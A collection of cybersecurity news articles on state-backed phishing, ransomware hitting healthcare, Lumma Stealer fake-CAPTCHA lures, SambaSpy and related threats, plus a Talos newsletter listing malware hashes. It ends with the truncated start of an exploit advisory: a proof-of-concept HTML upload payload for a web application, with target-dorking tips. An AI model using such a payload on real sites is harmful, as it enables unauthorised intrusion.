How the Kimsuky nation-state group and other threat actors are exploiting poor email security — and what organizations can do to defend themselves.

Dr. Sean Costigan, Managing Director, Resilience Strategy, Red Sift

September 20, 2024

5 Min Read

Source: Brian Jackson via Alamy Stock Photo

COMMENTARY

With heightened geopolitical tensions, a surge in cyberattacks on US and allied organizations by a North Korean cyber-espionage group is hardly unexpected. What is disquieting, however, is that an advanced persistent threat (APT) group known as Kimsuky has seen remarkable success by turning a defensive strength into a weakness — exploiting poorly configured Domain-based Message Authentication, Reporting and Conformance (DMARC) policies to carry out spear-phishing campaigns to secure advantage.

A May 2 advisory from the FBI, the National Security Agency (NSA), and the US State Department stated that Kimsuky, acting as an arm of North Korea's Reconnaissance General Bureau (RGB), has been sending spoofed emails to individuals in high-profile think tanks, media outlets, nonprofits, academia, and other organizations. The emails are part of an intelligence campaign to troll for information on geopolitics and foreign policy plans, particularly related to nuclear policies, sanctions, and other sensitive concerns involving the Korean peninsula.    

With sanctions biting, North Korea has developed a formidable cybercrime capability to generate liquidity for the regime. However, in this case, we see Kimsuky threat actors alter their focus to intelligence operations, targeting troves of information held by trusted parties and prominent organizations. Although the ongoing campaign has complex geopolitical implications, effectively defending against these attacks fundamentally relies on robust, actionable, and properly executed cyber-hygiene practices.

Related:Singapore Arrests 6 Suspected Members of African Cybercrime Group

**DMARC Misconfigurations Are Too Common**

Kimsuky is using trusted networks with improperly configured or missing DMARC to spoof legitimate domains and impersonate trusted personalities and organizations. The DMARC protocol was created to stop the compromise of user accounts and hinder the very types of social engineering at work here.

This is how it's supposed to work: DMARC allows email recipients to verify an email's origin through the Domain Name System (DNS), ensuring that threat actors cannot spoof legitimate domains. DMARC checks the Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) records for an incoming email and, if it does not appear to be legitimate, tells the receiving email server what to do next.

But as Kimsuky's attacks have shown, that only works if DMARC services are properly configured. As the IC3 advisories detail, misconfigurations are far too common or policies are poorly defined by the domain owners. For some organizations, self-managing DMARC may seem cost-effective, but it can also lead to significant oversights, including increasing vulnerabilities, failing to pay heed to evolving threats, missing sound compliance reporting, and creating a false sense of security.  

Related:Indian Army Propaganda Spread by 1.4K AI-Powered Social Media Accounts

**What North Korea's Attack Looks Like**

Kimsuky's spear-phishing campaigns may begin with an innocuous email from a seemingly credible source, building trust before sending a subsequent email with a malicious link or attachment. The group then uses successful compromises to escalate attacks with more credible spear-phishing emails aimed at higher-value targets.

The group focuses its intelligence-gathering activities against South Korea, Japan, and the United States, targeting individuals identified as experts in various fields. According to a subsequent advisory from the Cybersecurity and Infrastructure Security Agency (CISA), think tanks and South Korean government entities have also been targeted.  

One real-world example from the FBI-NSA advisory had a subject line reading: "\[Invitation\] US Policy Toward North Korea Conference." The message, seemingly from a known university, begins: "I hope you and your family are enjoying a lovely holiday and a restful season. It is my privilege to invite you to provide a keynote address for a private workshop, hosted by the \[legitimate think tank\] to discuss the U.S. policy toward North Korea." As further inducement, the email also offers a $500 speaker's fee.

Related:Chinese Threat Actors Use MSI Files to Bypass Windows, VT Detection

Another email had the subject line "Questions about N. Korea," with the writer posing as a journalist from a legitimate media outlet and requesting an interview, followed by a broad outline of North Korea's nuclear activities.

In the university example, the email received a "pass" from SPF and DKIM checks, suggesting the attacker gained access to the university's legitimate email client. And although DMARC returned a "fail" because the sender's email domain differed from SPF and DKIM records for the legitimate source, the organization's DMARC policy was not set to take filtering action, so the message was delivered. In the second case, no DMARC policy was present, allowing the attacker to spoof the journalist's name and the news organization's email domain.

**Why DMARC Matters**

The US government's advisories offer compelling reasons for organizations to secure their digital estates. Kimsuky is not alone among APTs nor, more broadly, cybercriminals who work for profit: Lessons are shared and all are becoming increasingly savvy at targeting misconfigurations and weaknesses.

Securing and properly configuring DMARC is key since it improves organizational cyber hygiene and broadly protects against ubiquitous threats like business email compromise and ransomware email attacks.

Notably, industry or regulatory requirements may already make DMARC a requirement for your organization. As of February 2024, Google and Yahoo have required DMARC for organizations sending large volumes of email, and Microsoft is reportedly planning to follow suit. Additionally, the PCI DSS 4.0 requires implementation of DMARC. According to BIMI Radar, since the FBI's May 2 advisory, DMARC adoption globally has grown from 3.74 million organizations to 5.71 million organizations, as of June 17. 

There's a business imperative at work as well. Organizations must prioritize cyber hygiene to safeguard their digital assets, prevent data breaches, and protect against evolving cybersecurity threats. DMARC should be part of your organization's cyber posture. When properly managed, not only does it ensure better deliverability, provide protection against phishing and business email compromise (BEC), and enable the deployment of Brand Indicators for Message Identification (BIMI), but it can help close doors against nation-state espionage and cybercrime.

**About the Author**

Managing Director, Resilience Strategy, Red Sift

Sean Costigan is an expert in emerging security challenges and a highly sought-after speaker on technology and national security. He is the lead for NATO’s cybersecurity curriculum and is widely published on national security matters relating to information security and hybrid threats. He is also a Professor at the George C. Marshall Center, where he educates on global cybersecurity, hybrid warfare, crime, and national security.

North Korean APT Bypasses DMARC Email Policies in Cyber-Espionage Attacks

Inc ransomware — one of the most popular among cybercriminals today — meets healthcare, the industry sector most targeted by RaaS.

Source: Photo 12 via Alamy Stock Photo

Inc ransomware is on the rise, with one well-known threat actor recently using it to target American healthcare organizations.

Vice Society, which Microsoft tracks as Vanilla Tempest, has been active since July 2022. In that time, the Russian-speaking group has made use of various families of ransomware to aid its double extortion attacks, including BlackCat, Hello Kitty, Quantum Locker, Rhysida, Zeppelin — including its own variant — and its own, eponymous program.

In a series of posts on X, Microsoft Threat Intelligence Center (MSTIC) flagged the group's latest weapon: Inc ransomware.

"Vanilla Tempest is one of the most active ransomware operators MSTIC tracks," says Jeremy Dallman, senior director of threat intelligence for MSTIC. "While we've seen them targeting healthcare for quite a while, the notable shift here is their use of an Inc ransomware payload as they leverage the larger ransomware-as-a-service ecosystem."

**Vice Society's Latest Foray into Healthcare**

Vice Society flirts with various industries, including IT and manufacturing, but it's best known for its campaigns against the education and healthcare sectors.

In that sense, it's in line with the broader threat landscape. According to Check Point Research, healthcare is the industry most frequently targeted by ransomware actors. Other kinds of cybercriminals like it too, evidently, with global healthcare organizations experiencing an average of 2,018 attacks per week, a 32% rise over last year.

It only makes sense, warns Cindi Carter, Check Point's CISO for the Americas. Besides being hamstrung by outdated legacy technology and bureaucracy, "The type of data that healthcare organizations capture, create, and share is of high value to cybercriminals," she says. "Your medical record is the single most identifiable piece of digital information about you besides your own fingerprint," she says.

In recent activity leveraging the healthcare sector's inherent weaknesses, Vice Society received initial access to victims that previously had been infected with the Gootloader backdoor-loader. Then it deployed tools including the Supper backdoor, AnyDesk's remote monitoring and management (RMM) solution, and MEGA's data synchronization tool, the latter two of which are legitimate commercial products. The group used Remote Desktop Protocol (RDP) to perform lateral movement in affected networks, and abused the Windows Management Instrumentation (WMI) provider host to drop Inc ransomware.

**The Rise of Inc Ransomware**

Active since last summer, the Inc ransomware-as-a-service (RaaS) operation has earned plenty of headlines for its compromises of particularly large organizations — Xerox and Scotland's National Health Service (NHS), among others. And its modus operandi fits the scope of its ambition, says Jason Baker, threat intelligence consultant for GuidePoint Security.

"The aspect of Inc affiliates in particular that makes them stand out is that they have a very structured way of working through the negotiations process. There's no winging it. There are no off-the-cuff remarks. Agitation and threats are kept relatively minimal," he recalls from dealing with them firsthand.

"It's like the difference between somebody robbing a bank and somebody sticking somebody up in an alley. You can tell when somebody's put thought into \[an attack\] and knows what they're doing," he says.

As Dark Reading reported last month, Inc's malware leaked information about the nature and success of its data encryption. Though this could potentially lend defenders a leg up in remediation and potential negotiations with its affiliates, Baker warns that the reality is more complicated, especially when it comes to healthcare.

"If an organization knows that they can recover, and that they don't need a decryptor, that substantially decreases the feeling that they need to pay a ransom," he notes. "But where it's complicated is in modern double extortion, particularly if there's sensitive personally identifiable health information (PHI), or if there's sensitive intellectual property involved. There's a reason why the double extortion methodology has stuck around for as long as it has: It does, to some extent, overcome even an ability to recover."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Vice Society Pivots to Inc Ransomware in Healthcare Attack

Many GitHub users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware. While it's unlikely that many programmers fell for this scam, it's notable because less targeted versions of it are likely to be far more successful against the average Windows user.

Many **GitHub** users this week received a novel phishing email warning of critical security holes in their code. Those who clicked the link for details were asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes **Microsoft Windows** to download password-stealing malware. While it’s unlikely that many programmers fell for this scam, it’s notable because less targeted versions of it are likely to be far more successful against the average Windows user.

A reader named Chris shared an email he received this week that spoofed GitHub’s security team and warned: “Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner\[.\]com to get more information on how to fix this issue.”

Visiting that link generates a web page that asks the visitor to “Verify You Are Human” by solving an unusual CAPTCHA.

This malware attack pretends to be a CAPTCHA intended to separate humans from bots.

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Executing this series of keypresses prompts the built-in Windows Powershell to download password-stealing malware.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to launch a **PowerShell** command, and then fetch and execute a malicious file from github-scanner\[.\]com called “**l6e.exe**.”

PowerShell is a powerful, cross-platform automation tool built into Windows that is designed to make it simpler for administrators to automate tasks on a PC or across multiple computers on the same network.

According to an analysis at the malware scanning service **Virustotal.com**, the malicious file downloaded by the pasted text is called **Lumma Stealer**, and it’s designed to snarf any credentials stored on the victim’s PC.

This phishing campaign may not have fooled many programmers, who no doubt natively understand that pressing the Windows and “R” keys will open up a “Run” prompt, or that Ctrl-V will dump the contents of the clipboard.

But I bet the same approach would work just fine to trick some of my less tech-savvy friends and relatives into running malware on their PCs. I’d also bet none of these people have ever heard of PowerShell, let alone had occasion to intentionally launch a PowerShell terminal.

Given those realities, it would be nice if there were a simple way to disable or at least heavily restrict PowerShell for normal end users for whom it could become more of a liability.

However, Microsoft strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What’s more, doing so requires tinkering with sensitive settings in the Windows registry, which can be a dicey undertaking even for the learned.

Still, it wouldn’t hurt to share this article with the Windows users in your life who fit the less-savvy profile. Because this particular scam has a great deal of room for growth and creativity.

This Windows PowerShell Phish Has Scary Potential

This year, Congress only allocated $55 million in federal grant dollars to states for security and other election improvements.

Thursday, September 19, 2024 14:00

Last week, six Secretaries of State testified to U.S. Congress about the current state of election security ahead of November’s Presidential election. 

Some of the same topics came up as usual — disinformation campaigns, influence from foreign actors, and the physical protection of poll workers on election day. 

It’s good that these conversations are continuing after the various revelations that came out after the 2016 presidential election, and election security is an issue globally, especially this year when there are major elections taking place in hundreds of countries.  

As with many things in politics and life, though, there is still an issue of money. 

Talk of the importance of election security is positive, but at the end of the day, states and municipalities will need monetary and human resources to implement the appropriate defenses and protect everything from voting machines to online vote-tallying systems and social media disinformation campaigns.  

Arizona Secretary of State Adrian Fontes used his time in front of Congress to ask for additional funding, because his state has been unable to execute all their election security goals.  

“None of this is free and none of it is cheap,” he said. “Our operations, administration and security depend on intermittent, rare and never enough funding for the Help America Vote Act grants that we are occasionally given by Congress.” 

Additional federal funds became available for U.S. elections in 2017 after the Department of Homeland Security deemed election systems to be critical infrastructure. But this year, Congress only allocated $55 million in federal grant dollars to states for security and other improvements to elections. For comparison’s sake, presidential and Congressional candidates in the U.S. spent $14 billion on their election campaigns, more than double the amount from 2016. 

At the time, Republican lawmakers in the House voted to totally zero out the fund for the Help America Vote Act, or HAVA, grants, which have existed since 2002. 

One lobbyist even told the Stateline outlet earlier this year that many states were trying to stretch the money they do get from the HAVA program across multiple years for fear of a lack of funding in the coming election cycles.  

JP Martin, deputy communications director for the Arizona secretary of state, said in that same article that Arizona (a crucial swing state in most presidential elections) has had to put a hiring freeze in place because a lack of federal funding. 

So, talk, awareness and planning to secure elections are all positive things. But at the end of the day, all these technologies and solutions, and the people that provide them, cost money. 

**The one big thing **

Cisco Talos’ Vulnerability Research team discovered two vulnerabilities have been disclosed and fixed over the past few weeks. Talos discovered a time-of-check time-of-use vulnerability in Adobe Acrobat Reader, one of the most popular PDF readers currently available, and an information disclosure vulnerability in the Microsoft Windows AllJoyn API. 

**Why do I care? **

AllJoyn is a DCOM-like framework for creating method calls or sending one-way signals between applications on a distributed bus. It primarily is used in internet-of-things (IoT) devices to tell the devices to perform certain tasks, like turning lights on or off or reading the temperature of a space. TALOS-2024-1980 (CVE-2024-38257) could allow an adversary to view uninitialized memory on the targeted machine. Adobe Acrobat Reader, one of the most popular pieces of PDF reading software currently available, contains a time-of-check, use-after-free vulnerability that could trigger memory corruption, and eventually, arbitrary code execution. 

**So now what? **

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.  

**Top security headlines of the week **

**Experts and governments are still unpacking a wave of pager and handheld radio explosions in the Middle East.** The attacks appeared to target members of the armed group Hezbollah in Lebanon when hundreds of devices exploded simultaneously on Tuesday, killing multiple people. The international community has been left wondering if this was some type of cyber attack or intentional physical implants in the devices. Messages sent at the time of the attack appeared to come from Hezbollah leadership but instead triggered the explosions. Most analysts are assuming that this was a hardware supply chain attack, in which the pagers were tampered with somehow during manufacturing or while they were in transit. Supply chain attacks are normally carried out at the software level. So far, no one has taken credit for the attacks, though Hezbollah is blaming Israel, one of its chief antagonists. (Reuters, BBC) 

**Ransomware gangs are increasingly leveraging Microsoft Azure to steal victims’ information and store it.** New research findings indicate that groups like BianLian and Rhysida use Microsoft's Azure Storage Explorer and AzCopy to steal data from infiltrated networks, then store it in Azure Blob storage until it can be transferred to an attacker-controlled network. Because Azure is a popular and trusted service, corporate firewalls and security tools are unlikely to block it, making the data transfers more likely to pass undetected. Potential targets that use Azure are recommended to log out of the application after each use to prevent attackers from using the active session for file theft. (Bleeping Computer, modePUSH) 

**Health care facilities and medical devices continue to be top targets for ransomware actors, and industry leaders are calling on the U.S. federal government to do more to assist them.** This year, several massive health care providers across the globe have been affected by cyber attacks, forcing countless surgeries and appointments to be rescheduled and putting sensitive medical records at risk. Past victims include Change Healthcare, Kaiser Permanente and Ascension. One health care executive told NPR that their company was still trying to calculate the financial impact of the Change attack, which paused payments from insurance for months. They are only just now being paid out for services rendered in July. U.S. Sen. Ron Wyden, the chair of the Senate Finance Committee, recently publicly called on the Health and Human Services Department to revise its current approach to cybersecurity, because the current system “is woefully inadequate and has left the health care system vulnerable to criminals and foreign government hackers.” Other experts have said that HHS has traditionally focused on physical disasters like earthquakes, storms and power outages, and not enough on cyberspace. (NPR, Security Intelligence) 

**Can’t get enough Talos? **

*   Despite Russia warnings, Western critical infrastructure remains unprepared 
*   The Cybersecurity Cat-And-Mouse Game 
*   DragonRank Manipulates SEO Rankings To Direct Users To Malicious Sites 

**Upcoming events where you can find Talos**

**VB2024** **(Oct. 2 - 4)** 

_Dublin, Ireland_ 

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** b9ddbd1a4cec61e6b022a275d66312b5b676f9a0a9537a7708de9aa8ce34de59   
**MD5:** 3b100bdcd61bb1da816cd7eaf9ef13ba   
**Typical Filename:** vt-upload-C6In1   
**Claimed Product:** N/A    
**Detection Name:** Backdoor:KillAV-tpd  

**SHA 256:** 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
**MD5:** 71fea034b422e4a17ebb06022532fdde   
**Typical Filename:** VID001.exe   
**Claimed Product:** N/A   
**Detection Name:** RF.Talos.80 

**SHA 256:** 70ff63cd695033f624a456a5c8511ce8312cffd8ac40492ffe5dc7ae18548668   
**MD5:** 49d35332a1c6fefae1d31a581a66ab46   
**Typical Filename:** 49d35332a1c6fefae1d31a581a66ab46.virus   
**Claimed Product:** N/A     
**Detection Name:** W32.Auto:70ff63.in03.Talos 

**SHA 256:** 3a2ea65faefdc64d83dd4c06ef617d6ac683f781c093008c8996277732d9bd66   
**MD5:** 8b84d61bf3ffec822e2daf4a3665308c   
**Typical Filename:** RemComSvc.exe   
**Claimed Product:** N/A   
**Detection Name:** W32.3A2EA65FAE-95.SBX.TG 

**SHA 256:** 35dcf857f0bb2ea75bf4582b67a2a72d7e21d96562b4c8a61b5d598bd2327c2c   
**MD5:** fab8aabfdabe44c9a1ffa779fda207db   
**Typical Filename:** ACenter.exe   
**Claimed Product:** Aranda AGENT   
**Detection Name:** Win.Trojan.Generic::tg.talos

Talk of election security is good, but we still need more money to solve the problem

A new phishing campaign uses fake CAPTCHA verification pages to trick Windows users into running malicious PowerShell commands,…

A new phishing campaign uses fake CAPTCHA verification pages to trick Windows users into running malicious PowerShell commands, installing the Lumma Stealer malware and stealing sensitive information. Stay informed and protected.

Cybersecurity researchers at CloudSec have discovered a new phishing campaign that is tricking users into running malicious commands through fake human verification pages. The campaign, which primarily targets Windows users, aims to install the **Lumma Stealer malware**, leading to the theft of sensitive information.

**How the Attack Works**

Threat actors are creating phishing sites hosted on various platforms, including Amazon S3 buckets and Content Delivery Networks (CDNs). These sites mimic legitimate verification pages, such as fake **Google CAPTCHA** pages. When users click the “Verify” button, they are presented with unusual instructions:

1.  **Open the Run dialog (Win+R)**
2.  **Press Ctrl+V**
3.  **Hit Enter**

Unknown to the user, these actions execute a hidden JavaScript function that copies a base64-encoded PowerShell command to the clipboard. When the user pastes and runs the command, it downloads the Lumma Stealer malware from a remote server.

CloudSec’s **report** shared with Hackread.com ahead of publishing on Thursday, revealed that the downloaded malware often downloads additional malicious components, making detection and removal more difficult. While currently used to spread Lumma Stealer, this technique could be easily adapted to deliver other types of malware.

Attack flow and fake verification process triggered when the user clicks on the fake Google CAPTCHA prompt (Screenshot: CloudSec)

For your information, the Lumma Stealer is designed to steal sensitive data from the infected device. While the specific data targeted can vary, it often includes login credentials, financial information, and personal files. This latest campaign came just days after the malware was caught disguising itself as an **OnlyFans hacker tool**, infecting the devices of other hackers.

**In January 2024**, Lumma was discovered to be spreading through cracked software distributed via compromised YouTube channels. Earlier, **in November 2023**, researchers had identified a new version of LummaC2, called LummaC2 v4.0, which was stealing user data using trigonometric techniques to detect human users.

> I hereby confirm. https://t.co/1q4cARQLDM pic.twitter.com/GEBzqJeaSs
> 
> — Waqas (@WAK4S) December 31, 2023

****What Now?****

Now that the new Lumma stealer infection spree has been reported, businesses and unsuspecting users need to stay alert and avoid falling for the latest fake verification scam. Here are some common-sense rules and simple yet essential tips for protection against Lumma and other similar stealers:

*   **Educate yourself and others:** Share this information with friends, family, and colleagues to raise awareness about this new threat.
*   **Be wary of unusual verification requests:** Legitimate websites rarely ask users to execute commands through the “Run” dialogue box. Be suspicious of any site that makes such requests.
*   **Don’t copy and paste unknown commands:** Avoid copying and pasting anything from untrusted sources, especially commands meant to be run in a terminal or command prompt.
*   **Keep your software updated:** Ensure your operating system and antivirus software are up-to-date to patch known vulnerabilities.
*   **Most Important:** Follow Hackread.com for the latest cybersecurity news.

1.  **Fake Antivirus Sites Spread Malware**
2.  **Analysis of Top Infostealers: Redline, Vidar, Formbook**
3.  **Hackers using CAPTCHA to evade phishing, malware detection**
4.  **Unicode QR Code Phishing Scam Bypasses Traditional Security**
5.  **Android banking malware distributed with fake Google reCAPTCHA**

Fake CAPTCHA Verification Pages Spreading Lumma Stealer Malware

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.
"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the

A previously undocumented malware called SambaSpy is exclusively targeting users in Italy via a phishing campaign orchestrated by a suspected Brazilian Portuguese-speaking threat actor.

"Threat actors usually try to cast a wide net to maximize their profits, but these attackers are focused on just one country," Kaspersky said in a new analysis. "It's likely that the attackers are testing the waters with Italian users before expanding their operation to other countries."

The starting point of the attack is a phishing email that either includes an HTML attachment or an embedded link that initiates the infection process. Should the HTML attachment be opened, a ZIP archive containing an interim downloader or dropper is used to deploy and launch the multi-functional RAT payload.

The downloader, for its part, is responsible for fetching the malware from a remote server. The dropper, on the other hand, does the same thing, but extracts the payload from the archive instead of retrieving it from an external location.

The second infection chain with the booby-trapped link is a lot more elaborate, as clicking it redirects the user to a legitimate invoice hosted on FattureInCloud if they are not the intended target.

In an alternate scenario, clicking on the same URL takes the victim to a malicious web server that serves an HTML page with JavaScript code featuring comments written in Brazilian Portuguese.

"It redirects users to a malicious OneDrive URL but only if they are running Edge, Firefox, or Chrome with their language set to Italian," the Russian cybersecurity vendor said. "If the users don't pass these checks, they stay on the page."

Users who meet these requirements are served a PDF document hosted on Microsoft OneDrive that instructs the users to click on a hyperlink to view the document, following which they are led to a malicious JAR file hosted on MediaFire containing either the downloader or the dropper as before.

A fully-featured remote access trojan developed in Java, SambaSpy is nothing short of a Swiss Army knife that can handle file system management, process management, remote desktop management, file upload/download, webcam control, keylogging and clipboard tracking, screenshot capture, and remote shell.

It's also equipped to load additional plugins at runtime by launching a file on the disk previously downloaded by the RAT, allowing it to augment its capabilities as needed. On top of that, it's designed to steal credentials from web browsers like Chrome, Edge, Opera, Brave, Iridium, and Vivaldi.

Infrastructure evidence suggests that the threat actor behind the campaign is also setting their sights on Brazil and Spain, pointing to an operational expansion.

"There are various connections with Brazil, such as language artifacts in the code and domains targeting Brazilian users," Kaspersky said. "This aligns with the fact that attackers from Latin America often target European countries with closely related languages, namely Italy, Spain, and Portugal."

**New BBTok and Mekotio Campaigns Target Latin America**

The development comes weeks after Trend Micro warned of a surge in campaigns delivering banking trojans such as BBTok, Grandoreiro, and Mekotio targeting the Latin American region via phishing scams that utilize business transactions and judicial-related transactions as lures.

Mekotio "employs a new technique where the trojan's PowerShell script is now obfuscated, enhancing its ability to evade detection," the company said, highlighting BBTok's use of phishing links to download ZIP or ISO files containing LNK files that act as a trigger point for the infections.

The LNK file is used to advance to the next step by launching the legitimate MSBuild.exe binary, which is present within the ISO file. It subsequently loads a malicious XML file also hidden within the ISO archive, which then leverages rundll32.exe to launch the BBTok DLL payload.

"By using the legitimate Windows utility MSBuild.exe, attackers can execute their malicious code while evading detection," Trend Micro noted.

The attack chains associated with Mekotio commence with a malicious URL in the phishing email that, when clicked, directs the user to a bogus website that delivers a ZIP archive, which contains a batch file that's engineered to run a PowerShell script.

The PowerShell script acts as a second-stage downloader to launch the trojan by means of an AutoHotKey script, but not before conducting a reconnaissance of the victim environment to confirm it's indeed located in one of the targeted countries.

"More sophisticated phishing scams targeting Latin American users to steal sensitive banking credentials and carry out unauthorized banking transactions underscores the urgent need for enhanced cybersecurity measures against increasingly advanced methods employed by cybercriminals," Trend Micro researchers said.

"These trojans \[have\] grown increasingly adept at evading detection and stealing sensitive information while the gangs behind them become bolder in targeting larger groups for more profit."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Brazilian-Linked SambaSpy Malware Targets Italian Users via Phishing Emails

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.
The tech giant's threat intelligence team is tracking the activity under the name Vanilla Tempest (formerly DEV-0832).
"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494,

Microsoft has revealed that a financially motivated threat actor has been observed using a ransomware strain called INC for the first time to target the healthcare sector in the U.S.

The tech giant's threat intelligence team is tracking the activity under the name **Vanilla Tempest** (formerly DEV-0832).

"Vanilla Tempest receives hand-offs from GootLoader infections by the threat actor Storm-0494, before deploying tools like the Supper backdoor, the legitimate AnyDesk remote monitoring and management (RMM) tool, and the MEGA data synchronization tool," it said in a series of posts shared on X.

In the next step, the attackers proceed to carry out lateral movement through Remote Desktop Protocol (RDP) and then use the Windows Management Instrumentation (WMI) Provider Host to deploy the INC ransomware payload.

The Windows maker said Vanilla Tempest has been active since at least July 2022, with previous attacks targeting education, healthcare, IT, and manufacturing sectors using various ransomware families such as BlackCat, Quantum Locker, Zeppelin, and Rhysida.

It's worth noting that the threat actor is also tracked under the name Vice Society, which is known for employing already existing lockers to carry out their attacks, as opposed to building a custom version of their own.

The development comes as ransomware groups like BianLian and Rhysida have been observed increasingly using Azure Storage Explorer and AzCopy to exfiltrate sensitive data from compromised networks in an attempt to evade detection.

"This tool, used for managing Azure storage and objects within it, is being repurposed by threat actors for large-scale data transfers to cloud storage," modePUSH researcher Britton Manahan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Warns of New INC Ransomware Targeting U.S. Healthcare Sector

Hackers sent a convincing lure document, but after 20 years of similar attacks, the target organization was well prepared.

Source: elifbayraktar via Alamy Stock Photo

A meeting of influential figures in and around the US and Taiwanese defense industries has been targeted by a phishing attack carrying fileless malware.

The 23rd US-Taiwan Defense Industry Conference will be held next week in Philadelphia's Logan Square neighborhood. Closed to the press, it will feature speakers from government, defense, academia, and commercial sectors in the US and Taiwan. The focus, according to its website, will be "addressing the future of US defense cooperation with Taiwan, the defense procurement process, and Taiwan's defense and national security needs."

Recently, the US-Taiwan Business Council — the organization behind the event — was sent a malicious forgery of its own registration form. The form was paired with information-stealing malware designed to execute entirely in memory, making it more difficult to detect with traditional antivirus software. Thanks to diligent anti-phishing preparations, however, the council quickly rebuffed the attack.

**Threats to a Taiwan Defense Conference**

Eight years ago, a Chinese phishing email was sent to members of Taiwan's defense industry, including some attendees of the 15th US-Taiwan Defense Industry Conference. Even by then, though, it was old hat.

"In the period from 2003 to 2011, we were heavily targeted with spear-phishing emails constantly," reports Lotta Danielsson, vice president of the US-Taiwan Business Council. "There was an uptick in 2016-2017, but it has been very quiet for the last several years. Usually, it increases in the leadup to and right after the annual defense conference, then it subsides again."

In the leadup to this year's conference, rather than attendees, the attack seemed to target the council itself. It came in an email, from an individual posing as a potential attendee. Rather than use the event's online form, the impersonator sent a filled out copy of the registration form as a PDF, which attendees can do if they experience technical issues with the site.

Source: Cyble

The document, according to analysis from Cyble, came with a ZIP file that was supposed to drop a malicious Windows shortcut (LNK) file. If opened, the LNK would have established persistence on its targeted machine by placing an executable file in the Windows startup folder. Upon reboot, the executable would download additional payloads to be executed directly in the machine's memory, without saving any files to disk. Ultimately, the malware could exfiltrate data back to an attacker-controlled server through Web requests designed to blend with normal network traffic.

Cyble researchers were unable to tie the attack to any specific threat actor. They noted, however, that Chinese entities in particular have a long history of targeting Taiwan.

"We've seen very clearly in the last few years that there are a lot of problems in East Asian geopolitics — military-related movements in the South China Sea, very sharp comments coming from Taiwan and China. And it looks like nation states are interested in US-Taiwan defense cooperation," says Kaustubh Medhe, head of research and intelligence for Cyble.

This latest phishing attempt fits neatly into that picture. "We have a strong suspicion that this could be used as a stealthy technique to perform long-term surveillance of people with a specific interest in this particular topic," he says.

**A Textbook Case of How to Prevent Phishing**

As Danielsson recalls, "We have been targeted by these types of spear phishing emails for a long time — more than 20 years — so we flagged it as suspicious right away. We did not open the file. Instead, we submitted it to VirusTotal and confirmed that it was malicious. Then we deleted it, and that was pretty much it."

She highlights a few keys to success that have helped the Council easily swat away its many phishing attacks over the years. "One is educational, so the entire staff is well educated on these types of attacks. Nobody clicks links in emails, or opens documents sent via email, unless we have talked to people directly and are expecting them. Even then, we often scan them before opening, unless the presumed content is very sensitive, in which case we will call people to double-check that they sent them," she says.

Besides that, she adds, "We keep our email clients text-only so it's easy to see any obfuscation of links right away. I log all traffic in and out of our system and keep an eye out for anomalies. We also take our entire system offline at night and on weekends, air-gapping our computers and internal IT systems. This is doable because we are a small office with three people, something that might be harder for a larger organization. I also have some relationships with people who work in the cybersecurity industry, and they have helped us think through what to do if we do end up failing to prevent an issue. We want to be prepared if it does."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Phishing Espionage Attack Targets US-Taiwan Defense Conference

Online Traffic Offense version 1.0 suffers from cross site request forgery and arbitrary file upload vulnerabilities.

    =============================================================================================================================================| # Title     : Online Traffic Offense 1.0 Auth by Pass Vulnerability                                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/traffic_offense_1.zip                                 |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" 